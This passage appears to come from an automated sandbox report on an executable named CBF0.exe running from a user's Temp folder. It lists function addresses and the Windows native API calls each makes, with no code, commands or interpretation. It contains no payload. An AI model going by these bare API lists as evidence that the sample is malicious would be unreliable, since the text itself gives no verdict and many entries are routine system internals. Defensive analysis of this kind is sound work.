Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B618B58 RtlGetCurrentServiceSessionId,ZwTraceEvent,		29_2_6B618B58
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B575306 ZwReleaseKeyedEvent,		29_2_6B575306
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B544B00 TpCallbackMayRunLong,TpCallbackMayRunLong,ZwSetInformationWorkerFactory,		29_2_6B544B00
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589B00 ZwSetValueKey,		29_2_6B589B00
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B549335 ZwClose,ZwClose,		29_2_6B549335
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B60131B RtlGetCurrentServiceSessionId,ZwTraceEvent,		29_2_6B60131B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B542BC2 ZwOpenThreadToken,ZwSetInformationThread,ZwClose,		29_2_6B542BC2
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5423F6 ZwClose,RtlFreeHeap,		29_2_6B5423F6
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589BF0 ZwAlertThreadByThreadId,		29_2_6B589BF0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B55A3E0 RtlFormatCurrentUserKeyPath,ZwQueryInformationToken,RtlLengthSidAsUnicodeString,RtlAppendUnicodeToString,RtlConvertSidToUnicodeString,RtlFreeUnicodeString,		29_2_6B55A3E0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B542B93 TpSetDefaultPoolMaxThreads,ZwDuplicateToken,		29_2_6B542B93
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B601BA8 RtlGetCurrentServiceSessionId,ZwTraceEvent,		29_2_6B601BA8
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57939F RtlInitializeCriticalSectionEx,ZwDelayExecution,		29_2_6B57939F
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B618BB6 RtlGetCurrentServiceSessionId,ZwTraceEvent,		29_2_6B618BB6
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B619BBE RtlGetCurrentServiceSessionId,ZwTraceEvent,		29_2_6B619BBE
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B60138A memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,		29_2_6B60138A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B58A3A0 ZwGetCompleteWnfStateSubscription,		29_2_6B58A3A0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B574BAD RtlAcquireSRWLockExclusive,memset,ZwTraceControl,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap,		29_2_6B574BAD
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B618A62 RtlGetCurrentServiceSessionId,ZwTraceEvent,		29_2_6B618A62
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589A50 ZwCreateFile,		29_2_6B589A50
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B549240 ZwClose,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlAcquireSRWLockExclusive,RtlFreeHeap,		29_2_6B549240
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D1242 ZwUnmapViewOfSection,ZwClose,ZwClose,ZwClose,ZwClose,ZwClose,		29_2_6B5D1242
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B545210 RtlGetCurrentDirectory_U,memcpy,RtlGetCurrentDirectory_U,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,		29_2_6B545210
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589A00 ZwProtectVirtualMemory,		29_2_6B589A00
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57B230 EtwEventWrite,ZwTraceEvent,RtlNtStatusToDosError,EtwEventWrite,		29_2_6B57B230
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589A30 ZwTerminateThread,		29_2_6B589A30
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B548239 RtlInitUnicodeStringEx,ZwQueryValueKey,RtlInitUnicodeStringEx,RtlPrefixUnicodeString,ZwEnumerateKey,ZwOpenKey,RtlInitUnicodeStringEx,ZwQueryValueKey,RtlFreeHeap,ZwClose,RtlAllocateHeap,RtlCompareUnicodeString,ZwClose,RtlFreeHeap,ZwClose,		29_2_6B548239
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B544A20 RtlGetCurrentServiceSessionId,RtlFreeHeap,ZwClose,RtlReleaseActivationContext,LdrUnloadDll,		29_2_6B544A20
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B618214 RtlAcquireSRWLockExclusive,ZwSetInformationWorkerFactory,RtlReleaseSRWLockExclusive,		29_2_6B618214
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D4A28 ZwOpenKey,DbgPrintEx,ZwQueryValueKey,DbgPrintEx,DbgPrintEx,memcpy,ZwClose,		29_2_6B5D4A28
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A229 ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwQueryVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlFillMemoryUlong,DbgPrint,DbgPrint,DbgPrint,		29_2_6B56A229
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56FAD0 RtlAcquireSRWLockShared,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockShared,ZwTerminateProcess,		29_2_6B56FAD0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D1AD6 ZwFreeVirtualMemory,		29_2_6B5D1AD6
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B58AAC0 ZwQueryWnfStateNameInformation,		29_2_6B58AAC0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589AE0 ZwTraceEvent,		29_2_6B589AE0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B58AAE0 ZwRaiseException,		29_2_6B58AAE0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B618ADD RtlGetCurrentServiceSessionId,ZwTraceEvent,		29_2_6B618ADD
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57D294 ZwQueryAttributesFile,RtlFreeHeap,ZwClose,RtlFreeHeap,		29_2_6B57D294
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B58AA90 ZwQuerySystemInformationEx,		29_2_6B58AA90
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54429E RtlInitUnicodeString,ZwClose,LdrQueryImageFileKeyOption,		29_2_6B54429E
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B562280 RtlAcquireSRWLockExclusive,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive,ZwTerminateProcess,		29_2_6B562280
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B58B280 ZwWow64DebuggerCall,		29_2_6B58B280
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57DA88 RtlAcquireSRWLockExclusive,RtlImageNtHeader,RtlAllocateHeap,ZwUnmapViewOfSection,ZwClose,RtlReAllocateHeap,		29_2_6B57DA88
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589AB0 ZwWaitForMultipleObjects,		29_2_6B589AB0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57E2BB ZwWaitForAlertByThreadId,		29_2_6B57E2BB
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B541AA0 RtlAllocateHandle,RtlReAllocateHeap,ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,RtlAllocateHeap,		29_2_6B541AA0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B575AA0 TpSetPoolMaxThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMaxThreads,		29_2_6B575AA0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54F150 RtlOpenCurrentUser,RtlFormatCurrentUserKeyPath,ZwOpenKey,RtlFreeUnicodeString,RtlOpenCurrentUser,RtlInitUnicodeString,ZwOpenKey,		29_2_6B54F150
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B618966 RtlGetCurrentServiceSessionId,ZwTraceEvent,		29_2_6B618966
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B58B150 ZwUnsubscribeWnfStateChange,		29_2_6B58B150
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54395E RtlAcquireSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwGetCompleteWnfStateSubscription,RtlFreeHeap,		29_2_6B54395E
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56B944 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,RtlGetCurrentServiceSessionId,ZwSetTimer2,RtlGetCurrentServiceSessionId,ZwCancelTimer2,		29_2_6B56B944
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57D976 ZwCreateFile,ZwCreateFile,		29_2_6B57D976
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54B171 ZwQueryDebugFilterState,_alloca_probe_16,memcpy,_vsnprintf,ZwWow64DebuggerCall,RtlRaiseException,		29_2_6B54B171
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D1976 ZwCreateEvent,		29_2_6B5D1976
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B58B160 ZwUpdateWnfStateData,		29_2_6B58B160
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B58A160 ZwCreateWorkerFactory,		29_2_6B58A160
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B549100 TpReleasePool,RtlAcquireSRWLockExclusive,ZwShutdownWorkerFactory,RtlGetCurrentServiceSessionId,TpReleasePool,TpReleasePool,RtlDebugPrintTimes,TpReleasePool,		29_2_6B549100
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B550100 LdrUnloadAlternateResourceModuleEx,RtlAcquireSRWLockExclusive,ZwUnmapViewOfSection,ZwClose,LdrUnloadAlternateResourceModuleEx,RtlFreeHeap,RtlFreeHeap,RtlReAllocateHeap,		29_2_6B550100
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589900 ZwOpenEvent,		29_2_6B589900
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B61F13B ZwOpenKey,ZwCreateKey,		29_2_6B61F13B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5E5100 RtlAssert,RtlCaptureContext,DbgPrintEx,DbgPrompt,ZwTerminateThread,DbgPrintEx,RtlAssert,ZwTerminateProcess,		29_2_6B5E5100
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D193B ZwRaiseException,ZwTerminateProcess,		29_2_6B5D193B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B58A130 ZwCreateWaitCompletionPacket,		29_2_6B58A130
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589920 ZwDuplicateToken,		29_2_6B589920
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B6189E7 RtlGetCurrentServiceSessionId,ZwTraceEvent,		29_2_6B6189E7
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D19C8 ZwCreateSection,ZwMapViewOfSection,memset,ZwUnmapViewOfSection,ZwClose,		29_2_6B5D19C8
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B6049A4 ZwAllocateVirtualMemory,RtlCompareMemory,memcpy,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,		29_2_6B6049A4
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589990 ZwQueryVolumeInformationFile,		29_2_6B589990
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54519E RtlEqualUnicodeString,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,		29_2_6B54519E
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56C182 RtlGetCurrentServiceSessionId,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive,		29_2_6B56C182
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B61F1B5 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap,		29_2_6B61F1B5
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B58B180 ZwWaitForAlertByThreadId,		29_2_6B58B180
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589980 ZwCreateEvent,		29_2_6B589980
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5F6186 ZwQueryValueKey,memmove,RtlInitUnicodeString,		29_2_6B5F6186
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5C51BE ZwQuerySystemInformation,ZwQuerySystemInformationEx,RtlAllocateHeap,ZwQuerySystemInformationEx,RtlFindCharInUnicodeString,RtlEnterCriticalSection,memcpy,		29_2_6B5C51BE
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B58A9B0 ZwQueryLicenseValue,		29_2_6B58A9B0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57C9BF DbgPrintEx,wcsrchr,memcpy,DbgPrintEx,ZwClose,DbgPrintEx,DbgPrintEx,RtlDosPathNameToRelativeNtPathName_U,DbgPrintEx,ZwOpenFile,ZwClose,RtlFreeHeap,DbgPrintEx,DbgPrintEx,DbgPrintEx,RtlDeleteBoundaryDescriptor,ZwClose,RtlFreeHeap,		29_2_6B57C9BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B60A189 RtlAcquireSRWLockExclusive,ZwGetNlsSectionPtr,RtlAllocateHeap,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,		29_2_6B60A189
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B58B1A0 ZwWaitForKeyedEvent,		29_2_6B58B1A0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B545050 RtlSetCurrentDirectory_U,RtlAllocateHeap,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlSetCurrentDirectory_U,RtlFreeHeap,RtlFreeHeap,		29_2_6B545050
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589850 ZwQueryDirectoryFile,		29_2_6B589850
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589840 ZwDelayExecution,		29_2_6B589840
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D1879 ZwAllocateVirtualMemory,memset,RtlInitializeSid,		29_2_6B5D1879
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B618858 ZwAlertThreadByThreadId,		29_2_6B618858
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B55106F ZwOpenKey,ZwClose,		29_2_6B55106F
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54F018 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap,		29_2_6B54F018
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589830 ZwOpenFile,		29_2_6B589830
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B574020 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion,		29_2_6B574020
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B61F019 RtlInitUnicodeString,RtlInitUnicodeString,ZwQueryValueKey,RtlAllocateHeap,ZwQueryValueKey,RtlInitUnicodeString,ZwClose,RtlFreeHeap,		29_2_6B61F019
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5898D0 ZwQueryAttributesFile,		29_2_6B5898D0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B58A0D0 ZwCreateTimer2,		29_2_6B58A0D0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5810D7 ZwOpenKey,ZwCreateKey,		29_2_6B5810D7
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5470C0 ZwClose,RtlFreeHeap,RtlFreeHeap,		29_2_6B5470C0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5800C2 ZwAlertThreadByThreadId,		29_2_6B5800C2
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54B8F0 TpSetPoolStackInformation,ZwSetInformationWorkerFactory,		29_2_6B54B8F0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5440FD RtlImageNtHeaderEx,DbgPrintEx,memset,RtlDebugPrintTimes,DbgPrintEx,wcsstr,DbgPrintEx,DbgPrintEx,wcschr,DbgPrintEx,ZwSetInformationProcess,		29_2_6B5440FD
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5F60E9 ZwOpenKey,ZwClose,ZwClose,		29_2_6B5F60E9
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56E090 RtlWow64EnableFsRedirectionEx,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent,		29_2_6B56E090
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B58A890 ZwQueryDebugFilterState,		29_2_6B58A890
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589890 ZwFsControlFile,		29_2_6B589890
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B58108B ZwClose,		29_2_6B58108B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B543880 TpSetWaitEx,RtlAllocateHeap,ZwGetCompleteWnfStateSubscription,RtlFreeHeap,TpSetWaitEx,		29_2_6B543880
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57A080 RtlDeleteCriticalSection,RtlAcquireSRWLockExclusive,RtlDeleteCriticalSection,RtlDeleteCriticalSection,ZwClose,RtlDeleteCriticalSection,		29_2_6B57A080
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57F0BF ZwOpenFile,RtlFreeHeap,ZwQueryVolumeInformationFile,RtlAllocateHeap,memcpy,ZwClose,ZwClose,RtlFreeHeap,		29_2_6B57F0BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B58B0B0 ZwTraceControl,		29_2_6B58B0B0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5718B9 ZwCreateTimer2,ZwCreateWaitCompletionPacket,ZwAssociateWaitCompletionPacket,ZwClose,		29_2_6B5718B9
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56F0AE ZwSetInformationWorkerFactory,		29_2_6B56F0AE
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5F60A2 ZwQueryInformationFile,		29_2_6B5F60A2
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D5F5F RtlInitUnicodeString,ZwOpenFile,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlAllocateHeap,RtlInitUnicodeString,ZwQueryDirectoryFile,RtlAllocateHeap,memcpy,RtlFreeHeap,ZwClose,		29_2_6B5D5F5F
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589750 ZwQueryInformationThread,		29_2_6B589750
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B618F6A RtlGetCurrentServiceSessionId,ZwTraceEvent,		29_2_6B618F6A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B580F48 ZwOpenKey,ZwClose,ZwClose,ZwCreateKey,RtlInitUnicodeStringEx,ZwSetValueKey,RtlInitUnicodeStringEx,ZwSetValueKey,ZwClose,		29_2_6B580F48
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589740 ZwOpenThreadToken,		29_2_6B589740
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57174B ZwFreeVirtualMemory,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory,		29_2_6B57174B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589F70 ZwCreateIoCompletion,		29_2_6B589F70
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589770 ZwSetInformationFile,		29_2_6B589770
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5FCF70 RtlpGetUserOrMachineUILanguage4NLS,RtlInitUnicodeString,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,ZwClose,		29_2_6B5FCF70
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D176C ZwOpenEvent,ZwWaitForSingleObject,ZwClose,		29_2_6B5D176C
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B546F60 RtlGetPersistedStateLocation,ZwOpenKey,memcpy,RtlGetPersistedStateLocation,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlAllocateHeap,ZwQueryValueKey,RtlExpandEnvironmentStrings,memcpy,ZwClose,ZwClose,RtlFreeHeap,		29_2_6B546F60
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B58AF60 ZwSetTimer2,		29_2_6B58AF60
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57CF6A memcpy,memcpy,RtlDosPathNameToRelativeNtPathName_U,ZwOpenFile,memcpy,RtlFreeHeap,RtlDeleteBoundaryDescriptor,DbgPrintEx,DbgPrintEx,DbgPrintEx,ZwClose,RtlFreeHeap,DbgPrintEx,memcpy,DbgPrintEx,ZwClose,		29_2_6B57CF6A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589710 ZwQueryInformationToken,		29_2_6B589710
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D6715 memset,memcpy,ZwTraceEvent,		29_2_6B5D6715
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B579702 RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwReleaseWorkerFactoryWorker,		29_2_6B579702
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57E730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,		29_2_6B57E730
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589730 ZwQueryVirtualMemory,		29_2_6B589730
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5FCF30 ZwAlertThreadByThreadId,		29_2_6B5FCF30
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57DFDF RtlWakeAddressAllNoFence,ZwAlertThreadByThreadId,RtlWakeAddressAllNoFence,		29_2_6B57DFDF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B58AFD0 ZwShutdownWorkerFactory,		29_2_6B58AFD0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54F7C0 EtwNotificationUnregister,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwClose,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,EtwNotificationUnregister,		29_2_6B54F7C0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5897C0 ZwTerminateProcess,		29_2_6B5897C0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57D7CA RtlImageNtHeader,RtlFreeHeap,ZwCreateSection,ZwMapViewOfSection,ZwClose,RtlImageNtHeader,ZwClose,RtlFreeHeap,ZwClose,ZwClose,ZwUnmapViewOfSection,		29_2_6B57D7CA
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B550FFD RtlInitUnicodeString,ZwQueryValueKey,		29_2_6B550FFD
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D0FEC ZwDuplicateObject,ZwDuplicateObject,		29_2_6B5D0FEC
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5737EB RtlImageNtHeader,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,ZwCreateIoCompletion,ZwCreateWorkerFactory,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwSetInformationWorkerFactory,		29_2_6B5737EB
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57FF9C RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlInitUnicodeString,		29_2_6B57FF9C
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5F5F87 ZwUnmapViewOfSection,		29_2_6B5F5F87
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D5780 DbgPrompt,ZwWow64DebuggerCall,		29_2_6B5D5780
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B542FB0 RtlDestroyHeap,RtlDeleteCriticalSection,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlDestroyHeap,DbgPrint,DbgPrint,DbgPrint,RtlDebugPrintTimes,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent,RtlGetCurrentServiceSessionId,ZwTraceEvent,		29_2_6B542FB0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5897A0 ZwUnmapViewOfSection,		29_2_6B5897A0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B583FA0 RtlGetLocaleFileMappingAddress,ZwInitializeNlsFiles,RtlGetLocaleFileMappingAddress,ZwUnmapViewOfSection,		29_2_6B583FA0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B58B650 RtlUnhandledExceptionFilter,ZwTerminateProcess,		29_2_6B58B650
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589650 ZwQueryValueKey,		29_2_6B589650
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D6652 ZwClose,RtlAllocateHeap,memcpy,ZwUnmapViewOfSection,		29_2_6B5D6652
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B58B640 RtlUnhandledExceptionFilter,ZwTerminateProcess,		29_2_6B58B640
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B58AE70 ZwSetInformationWorkerFactory,		29_2_6B58AE70
